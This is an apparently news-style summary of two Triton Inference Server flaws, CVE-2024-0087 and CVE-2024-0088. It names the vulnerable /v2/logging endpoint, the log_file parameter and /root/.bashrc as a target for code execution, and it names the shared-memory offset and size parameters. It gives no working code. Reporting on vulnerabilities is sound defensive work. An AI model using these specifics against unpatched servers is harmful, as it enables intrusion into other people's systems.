Critical Flaws in NVIDIA Triton Server

Two critical vulnerabilities have been identified in NVIDIA’s Triton Inference Server, which is widely used for AI inference. The first, CVE-2024-0087, involves an issue with the server’s log configuration interface. This vulnerability allows attackers to write arbitrary files by exploiting the log_file parameter at the /v2/logging endpoint. Attackers can target sensitive system files, such as /root/.bashrc, to inject malicious scripts that can lead to remote code execution when the server processes these files.

The second vulnerability, CVE-2024-0088, stems from inadequate parameter validation in the server’s shared memory handling. This flaw permits arbitrary address writing through parameters like shared_memory_offset and shared_memory_byte_size. Attackers can exploit this to cause segmentation faults and potentially access or leak sensitive memory data, impacting the server’s stability and security.

Proofs of concept for both vulnerabilities demonstrate their potential for significant damage. For CVE-2024-0087, attackers can use crafted POST requests to write commands to critical files, showcasing the risk of remote code execution. Similarly, CVE-2024-0088 can be exploited by registering a malicious shared memory region, leading to segmentation faults that highlight the flaw’s impact on server performance and data security.

The discovery of these vulnerabilities underscores the urgent need for enhanced security measures in AI infrastructure. Companies using Triton Server must promptly apply patches and strengthen their security protocols to mitigate these risks. The flaws in NVIDIA’s Triton Inference Server illustrate the ongoing challenges in AI security and the necessity for continuous vigilance and robust protection strategies.

Reference: